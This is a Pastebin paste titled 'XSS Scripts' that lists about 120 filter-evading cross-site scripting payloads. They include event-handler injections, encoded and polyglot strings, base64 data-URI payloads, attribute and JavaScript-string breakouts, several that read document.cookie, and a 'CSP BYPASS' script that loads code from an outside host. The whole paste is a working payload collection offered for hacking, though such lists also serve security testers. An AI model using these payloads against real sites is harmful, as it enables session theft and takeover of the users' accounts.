FlyFar

XSS Scripts

Feb 2nd, 2024
234
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.14 KB | Cybersecurity | 0 0
  1. <AuDiO/**/oNLoaDStaRt='(_=/**/confirm/**/(1))'/src><!--x
  2.  
  3. <mArquee onStart=[~[onmouseleave(([[(alert(1))]]))]] ]
  4.  
  5. <img src="/" =_=" title="onerror='/**/prompt(1)'">
  6.  
  7. <w="/x="y>"/ondblclick=`<`[confir\u006d``]>z
  8.  
  9. <a/onmousemove=alert(1)//>xss
  10.  
  11. <object allowscriptaccess=always><param name=code value=https://l0.cm/xss.swf>
  12.  
  13. <svg+onload=eval(location.hash.substr(1))>#alert(1)
  14.  
  15. <details/open/ontoggle=confirm('XSS')>
  16.  
  17. </script><svg><script>alert(1)/&apos;
  18.  
  19. <svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
  20.  
  21. <svg </onload ="1> (_=prompt,_(1)) "">
  22.  
  23. <svg 1=""onload=alert(1)>
  24.  
  25. <output name="jAvAsCriPt://&NewLine;\u0061ler&#116(1)" onclick="eval(name)">X</output>
  26.  
  27. <iframe srcdoc="&lt;img src&equals;x:x onerror&equals;alert&lpar;23&rpar;&gt;" />
  28.  
  29. <button onmousemove="javascript:alert(1)">xss
  30.  
  31. <BoDy%0AOnpaGeshoW=+window.prompt(1)
  32.  
  33. <a href=[0x0b]xss" onfocus=prompt(1) autofocus fragment="
  34.  
  35. <isindex type=image src=1 onerror=alert(1)>
  36.  
  37. <script>a=eval;b=alert;a(b(/ 1/.source));</script>'">
  38.  
  39. <!'/!"/!\'/\"/--!><Input/Type=Text AutoFocus */; OnFocus=(confirm)(1) //>
  40.  
  41. <style><img src="</style><img src=x "><object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
  42.  
  43. jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
  44.  
  45. <embed src=/x//alert(1)><base href="javascript:\
  46.  
  47. \u003csvg/onload=alert`1`\u003e
  48.  
  49. \<svg/onload=alert`1`\>
  50.  
  51. <article xmlns ="urn:img src=x onerror=xss()//" >xss
  52.  
  53. i\{\<\/\s\t\y\le\>\<\i\m\g\20\o\ne\r\r\o\r\=\'a\le\r\t\(d\oc\u\me\nt\.c\o\o\kie\)\'\s\rc\=\'eeeeeee\'\20\>{
  54.  
  55. <img / src = \ 'dfdfd \' // onerror = \ 'alert (document.cookie) \ '>
  56.  
  57. <img/src=q onerror='new Function`al\ert\`OPENBUGBOUNTY\``'>
  58.  
  59. <Html Onmouseover=(alert)(1) //
  60.  
  61. <a href="javascript&colon;alert&lpar;document&period;domain&rpar;">Click Here</a>
  62.  
  63. <script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>
  64.  
  65. <scr<!--esi-->ipt>aler<!--esi-->t(1)</sc<!--esi-->ript>
  66.  
  67. &#x003c;img src=1 onerror=confirm(1)&#x003e;
  68.  
  69. %26%23x003c%3Bimg%20src%3D1%20onerror%3Dalert(1)%26%23x003e%3B%0A
  70.  
  71. x%22%3E%3Cimg%20src=%22x%22%3E%3C!--%2522%2527--%253E%253CSvg%2520O%256ELoad%253Dconfirm%2528/xss/%2529%253E
  72.  
  73. <embed src=/x//alert(1)><base href="javascript:\
  74.  
  75. <x+oncut=y=prompt,y`1`>xss
  76.  
  77. <svG x=">" onload=(co\u006efirm)``>
  78.  
  79. <script/xss~~~>;alert(1);</script/X~~~>
  80.  
  81. <VideO/**/OnerroR=~alert("1")+/SrC>
  82.  
  83. <video/poster/onerror=prompt(1)>
  84.  
  85. <sVG/xss/OnLoaD+="window['confirm']+(1)">
  86.  
  87. <img x/src=x /onerror="x-\u0063onfirm(1)">
  88.  
  89. <VidEo/oNLoaDStaRt=confirm(1)+/src>
  90.  
  91. <video/src=//w3schools.com/tags/movie.mp4%0Aautoplay/onplay=(confirm(1))>
  92.  
  93. <p/%0Aonmouseover%0A=%0Aconfirm(1)>xss
  94.  
  95. <span/onmouseover=confirm(1)>xss
  96.  
  97. <iframe/name="javascript:confirm(1);"onload="while(1){eval(name);}">
  98.  
  99. <svg/onload=window.onerror=alert;throw/XSS/;//
  100.  
  101. <object data='data:text/html;base64,PFNDUklQVD5hbGVydCgnUkVOV0FYMjMnKTs8L1NDUklQVD4=' /src>
  102.  
  103. <InpuT/**/onfocus=pr\u006fmpt(1)%0Aautofocus>xss
  104.  
  105. <img src="x:alert" onerror="eval(src%2b'(1)')">
  106.  
  107. <img/src=xss%0A/**/onerror=eval('al'%2b'ert(1)')>
  108.  
  109. <img/alt=1 onerror=eval(src) src=x:alert(alt) >
  110.  
  111. <isindex/**/alt=1+src=xss:window['alert']/**/(alt)+type=image+onerror=while(true){eval(src)}>
  112.  
  113. <input type="text" name="foo" value=""autofocus/onfocus=alert(1)//">
  114.  
  115. <math href="javascript:alert(1)">CLICKME
  116.  
  117. <var onmouseover="prompt(1)">xss</var>
  118.  
  119. <h1/onmouseover='alert(1)'>xss
  120.  
  121. <object data="javascript:alert(1)">
  122.  
  123. <--'<script>window.confirm(1)</script> --!>
  124.  
  125. <div onmouseover=prompt("1")>xss
  126.  
  127. <img src=x onerror=window.open('data:text/html;base64,PFNDUklQVD5hbGVydCgnUkVOV0FYMjMnKTs8L1NDUklQVD4=');>
  128.  
  129. <plaintext/onmousemove=prompt(1)>xss
  130.  
  131. <marquee/onstart=alert(1)>xss
  132.  
  133. <embed src=javascript:alert(1)>
  134.  
  135. <select autofocus onfocus=alert(1)>
  136.  
  137. <textarea autofocus onfocus=alert(1)>
  138.  
  139. <keygen autofocus onfocus=alert(1)>
  140.  
  141. <div/onmouseover='alert(1)'>xss
  142.  
  143. <svg/onload=document.location.href='https://google.com'>
  144.  
  145. <audio src=x onerror=confirm("1")>
  146.  
  147. <iframe src="data:text/html;base64,PFNDUklQVD5hbGVydCgnUkVOV0FYMjMnKTs8L1NDUklQVD4="/>
  148.  
  149. <img%09onerror=alert(1) src=a>
  150.  
  151. <i onclick=alert(1)>Click here</i>
  152.  
  153. <img src=<b onerror=alert('xss');>
  154.  
  155. <img src="x:? title=" onerror=alert(1)//">
  156.  
  157. <img src="x:gif" onerror="eval('al'%2b'ert(/xss/)')">
  158.  
  159. <img src="x:gif" onerror="window['al\u0065rt'] (/'xss'/)"></img>
  160.  
  161. <a onmouseover%3D"alert(1)">xss
  162.  
  163. <script/%00%00v%00%00>alert(/xss/)</script>
  164.  
  165. <svg/onload=document.location.href='data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4='>
  166.  
  167. <script>$=1,alert($)</script>
  168.  
  169. <svg•onload=alert(1)>
  170.  
  171. <h1/onmouseover='alert(1)'>xss
  172.  
  173. <video onerror=alert(1337) </poster>
  174.  
  175. <input onfocus=alert(1337) </autofocus>
  176.  
  177.  
  178. CSP BYPASS:
  179.  
  180. <script>f=document.createElement("iframe");f.id="pwn";f.src="/robots.txt";f.onload=()=>{x=document.createElement('script');x.src='//bo0om.ru/csp.js';pwn.contentWindow.document.body.appendChild(x)};document.body.appendChild(f);</script>
  181.  
  182.  
  183. POLYGLOT:
  184.  
  185. javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
  186.  
  187.  
  188. HYPERLINK TAG INJECTION:
  189.  
  190. javascript:alert(1)
  191.  
  192. javascript://%250Aalert(document.location="https://google.com",document.location="https://www.facebook.com")
  193.  
  194. javascript://%250Aalert(document.cookie)
  195.  
  196. javascripT://https://google.com%0aalert(1);//https://google.com
  197.  
  198. /x:1/:///%01javascript:alert(document.cookie)/
  199.  
  200.  
  201. INLINE HTML INJECTION WITHOUT TAG BREAK:
  202.  
  203. " onclick=alert(1)//">click
  204.  
  205. " autofocus onfocus=alert(1) "
  206.  
  207. " onfocus=prompt(1) autofocus fragment="
  208.  
  209. " onmouseover="confirm(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"
  210.  
  211.  
  212. JAVASCRIPT INJECTION:
  213.  
  214. '?prompt`1`?'
  215.  
  216. "])},alert(1));(function xss() {//
  217.  
  218. ""});});});alert(1);$('a').each(function(i){$(this).click(function(event){x({y
  219.  
  220. "}]}';alert(1);{{'
  221.  
  222. 11111';\u006F\u006E\u0065rror=\u0063onfirm; throw'1
  223.  
  224. \');confirm(1);//
  225.  
  226. x");$=alert, $(1);//
  227.  
  228. '|alert(1)|'
  229.  
  230. '*prompt(1)*'
  231.  
  232. "; ||confirm('XSS') || "
  233.  
  234. "-alert(1)-"
  235.  
  236. \'-alert(1)};{//
  237.  
  238. "'-alert(1)-'"
  239.  
  240. \u0027-confirm`1`-\u0027
  241.  
  242. '}};alert(1);{{'
  243.  
Tags: Hack Scripts XSS
Add Comment
Please, Sign In to add comment